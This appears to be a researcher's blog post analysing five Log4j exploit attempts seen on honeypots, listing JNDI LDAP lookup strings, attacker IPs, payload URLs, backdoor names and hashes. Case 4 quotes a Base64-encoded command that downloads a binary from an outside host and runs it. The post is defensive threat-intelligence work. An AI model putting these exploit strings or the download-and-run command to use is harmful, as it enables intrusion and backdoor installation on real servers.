A look at five Log4J Exploit attempts

I had a look at some of the?#log4j?exploit attempts targeting our infrastructure at?AV-TEST?and our honeypots. I ended up examining five cases a bit closer, where three didn't deliver any payloads anymore and two still delivered malware.

Analysis of Case 1

Case 1 started with "ldap://139.59.175.247:1389/l6rntj" which loads ExecTemplateJDK8.class seen in the picture below. The Java code tries to download a payload from https://192.99.152.200/ which was already gone at the time of my analysis.

Hashes for ExecTemplateJDK8.class:

MD5: 3fc1e099376eed41851ff8927554d403

SHA1: 08cb932ac7644ca379777b16998d668ab6528ebe

SHA256: cd363b53611e80fa5628a50f19ce491b138c56ed7be59f9f8b46296bd2324727

Static detection by one AV in our test.?

Analysis of Case 2

Case 2 started with "ldap://67.205.191.102:1389/koejir" which loads the ExecTemplateJDK7.class seen in the picture below. The Java code tries to download a payload from https://212.47.237.67:443 which was already gone at the time of my analysis.

Hashes for ExecTemplateJDK7.class:

MD5: 855b44aa9a87ac4ca8e740e7f0a2f8aa

SHA1: 6f4858f01196c850278f436c6821e47fdef209f0

SHA256: 38e988a3de71bb3ae8cf33d781c72457ade9c30883402d4e56b14956cddd213a

Static detection by two AVs in our test.?

Analysis of Case 3

Case 3 started with "ldap://45.83.193.150:1389/Exploit" which loads the Exploit.class seen in the picture below. The Java code tries to determine whether it is running on Windows or not. If it is not it will download the payload from "https://68.183.165.105/.l/log"

The Windows payload from "https://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd" was already gone at the time of the analysis. However there were more files to download in case we are on Linux. See a screenshot of the "log" script. All those files were still available.

pty1 to pty5 are all ELF binaries detected as Backdoor Tsunami by the majority of the 24 AVs we tested. The file named ldm is a shell script also detected as Backdoor by most of the tested AVs. A snippet of its code is shown below.

Hashes for Exploit.class:

MD5: 35697fadc752d99409ccc4c7545d139f

SHA1: bd97f9eba8b7a879d775714ee1a4a815b73fd210

SHA256: 8ad160ddb9d617cf61ff0a7af0fa6d12ae26cf85a5d6e551c617f6c6bb770299

Detected by the majority of the 24 tested AVs as Java Downloader or similar.?

To keep it short here are only the SHA256 hashes for pty1 to pty5, log and ldm.

log: a290b6f956ecdb3d2d2019088f0b01a93a9f680c82a4680c0fb87eb5e3e64897

ldm: 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129?

pty1: c39eb055c5f71ebfd6881ff04e876f49495c0be5560687586fc47bf5faee0c84

pty2: 33dd6c0af99455a0ca3908c0117e16a513b39fabbf9c52ba24c7b09226ad8626

pty3: 4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c

pty4: b0a8b2259c00d563aa387d7e1a1f1527405da19bf4741053f5822071699795e2

pty5: 2752deb9f9f9602ca0c7bd41c3171d1560b929b6a4221ab07b0bf872d042f7e7?

Analysis of Case 4

Case 4 started with ldap://81.30.157.0:1389/Basic/Command/Base64/d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh with the actual command encoded as Base64 trying to download payload from https://155.94.154.170/aaa

This file aaa is a ELF binary detected as Backdoor Setag or Ganiw by most of the AVs. Hashes are

MD5: 9ce9b48d008cdfd002d7910bbb484ac2

SHA1: 58cfd7d4ab5e147e1453e7dc588d974f4e7aa456

SHA256: bcfdddb033fb1fa9c73e222919ecd4be071e87b0c54825af516b4f336bc47fa2?

Analysis of Case 5

The fifth and final case started with ldap://92.63.197.53:1389/or2q2y and downloaded ExecTemplateJDK5.class shown in the picture. This code also checks whether it is running on Windows or not and either uses cmd.exe or bash for the further steps.

The payload was already gone at the time of the analysis. Hashes for ExecTemplateJDK5.class are

MD5: b270fcf523b84fb6a18a648bd6e37cab

SHA1: d9ae46bdc4d187e7552bef9e0ab3197e8a8ffbca

SHA256: ebaf0f578ec615b14c12ed86d136db50b70e3033459d2704a2113f7bdbdf3110

Detected by only one AV.?